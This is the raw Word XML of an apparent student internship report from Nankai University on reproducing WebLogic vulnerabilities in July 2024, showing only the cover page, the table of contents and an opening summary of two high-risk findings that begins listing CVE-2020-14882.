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40A5F0" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="062AE1BA" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264"/>
    <w:p w14:paraId="362241A9" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264"/>
    <w:p w14:paraId="5B3DC6DC" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C02D749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南开大学</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440A04E7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t>实习实训漏洞复现报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6AF5A6" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="555EB214" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CE27BC3" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07B2C128" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FA8E2C9" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D112F42" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="574EC2BA" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03914BEA" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="781A0A86" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A12B191" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A32B6F4" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A1A014" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61871F9E" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D4D002" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264"/>
    <w:p w14:paraId="5A3CADDF" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264"/>
    <w:p w14:paraId="64E73959" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="158FF668" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EECBCE9" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B181B45" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16DB2419" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70049AA3" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264"/>
    <w:p w14:paraId="7BAD4AF5" w14:textId="69EB438D" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:jc w:val="center"/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t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>02</w:t>
      </w:r>
      <w:r w:rsidR="00BC2024">
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidR="00BC2024">
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00BC2024">
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r w:rsidR="00BC2024">
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4221A100" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:id w:val="147463564"/>
        <w15:color w:val="DBDBDB"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="1F2A4A8E" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
          <w:pPr>
            <w:jc w:val="center"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              <w:sz w:val="21"/>
            </w:rPr>
            <w:t>目录</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="347ADCFD" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:instrText xml:space="preserve">TOC \o "1-3" \h \u </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:cstheme="majorEastAsia" w:hint="eastAsia"/>
              <w:bCs/>
              <w:sz w:val="36"/>
              <w:szCs w:val="36"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc28487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漏洞复现结论（</w:t>
            </w:r>
            <w:r>
              <w:t>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分）</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc28487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687CA09D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481" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:t>1.1</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>风险等级分布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_Toc7481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102A848D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24528" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>工作计划（</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>25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_Toc24528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4A2BBCB6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3939" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:t>2.1</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>工作人员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_Toc13939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0AF3616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137" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:t>2.2</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞对象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_Toc3137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35EC19E9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7909" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:t>2.3</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞复现阶段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_Toc7909 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3DAADEA7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60" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2.4</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>风险等级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_Toc1860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5F2C92CB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6133" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞复现过程（</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>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_Toc6133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4C0865B0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8532" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">3.1 </w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>风险管理及规避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_Toc18532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7931F902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4033" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>测试方法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_Toc4033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0D2ACD6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445" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>测试中所用的工具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_Toc28445 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E166559" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12892" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">4. </w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞复现结果（</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>分）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_Toc12892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7C3AD002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32666" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>4.1 POC</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>插件编写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_Toc32666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774AE445" w14:textId="77777777" w:rsidR="008F6264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5120" w:history="1">
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">4.2 </w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞信息</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:instrText xml:space="preserve"> PAGEREF _Toc25120 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00AA5F05">
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0F241B89" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="774122F8" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18E779E2" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264"/>
    <w:p w14:paraId="033B9B43" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="008F6264">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:sectPr w:rsidR="008F6264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C009BF" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc14593"/>
      <w:bookmarkStart w:id="1" w:name="_Toc32228"/>
      <w:bookmarkStart w:id="2" w:name="_Toc28487"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现结论</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>1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"/>
    </w:p>
    <w:p w14:paraId="0242A4E8" w14:textId="66EC7A0E" w:rsidR="008F6264" w:rsidRDefault="00C86C72">
      <w:pPr>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>南开大学实习实训第五组</w:t>
      </w:r>
      <w:r w:rsidR="00AA5F05">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的安全人员采用科学的漏洞复现步骤于</w:t>
      </w:r>
      <w:r w:rsidR="00AA5F05">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="007D4FC3">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>024</w:t>
      </w:r>
      <w:r w:rsidR="00AA5F05">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidR="007D4FC3">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>07</w:t>
      </w:r>
      <w:r w:rsidR="00AA5F05">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r w:rsidR="007D4FC3">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="00AA5F05">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>日至</w:t>
      </w:r>
      <w:r w:rsidR="00AA5F05">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="007D4FC3">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>024</w:t>
      </w:r>
      <w:r w:rsidR="00AA5F05">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidR="007D4FC3">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>07</w:t>
      </w:r>
      <w:r w:rsidR="00AA5F05">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r w:rsidR="007D4FC3">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r w:rsidR="00AA5F05">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>日对</w:t>
      </w:r>
      <w:r w:rsidR="007D4FC3">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>we</w:t>
      </w:r>
      <w:r w:rsidR="007D4FC3">
        <w:rPr>
          <w:rFonts w:cs="宋体"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>blogic</w:t>
      </w:r>
      <w:r w:rsidR="007D4FC3">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>等漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00AA5F05">
        <w:rPr>
          <w:rFonts w:cs="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进行了全面深入的漏洞复现。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BD0B75" w14:textId="1D2FC5A5" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>本次共发现漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00C86C72">
        <w:rPr>
          <w:rFonts w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个，其高危漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00C86C72">
        <w:rPr>
          <w:rFonts w:cs="华文仿宋"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="华文仿宋" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个。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4714"/>
        <w:gridCol w:w="2213"/>
      </w:tblGrid>
      <w:tr w:rsidR="008F6264" w14:paraId="1893951E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="567"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C6D63AB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bookmarkStart w:id="3" w:name="_Hlk482954515"/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4714" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B9571A2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漏洞名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F353DE0" w14:textId="77777777" w:rsidR="008F6264" w:rsidRDefault="00AA5F05">
            <w:pPr>
              <w:pStyle w:val="20"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs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Times New Roman" w:hAnsi="Times New Roman" w:cs="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>风险值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F6264" w14:paraId="433A67EE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="712"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1595" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="06481CB2" w14:textId="03D8E857" w:rsidR="008F6264" w:rsidRDefault="000E35E9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/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4714" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17819AAE" w14:textId="19D7E6BF" w:rsidR="008F6264" w:rsidRDefault="007D4FC3" w:rsidP="007D4FC3">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007D4FC3">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CVE-2020-14882</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2213" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6217B9A9" w14:textId="58456AF3" w:rsidR="008F6264" w:rsidRDefault="007D4FC3" w:rsidP="007D4FC3">
            <w:pPr>
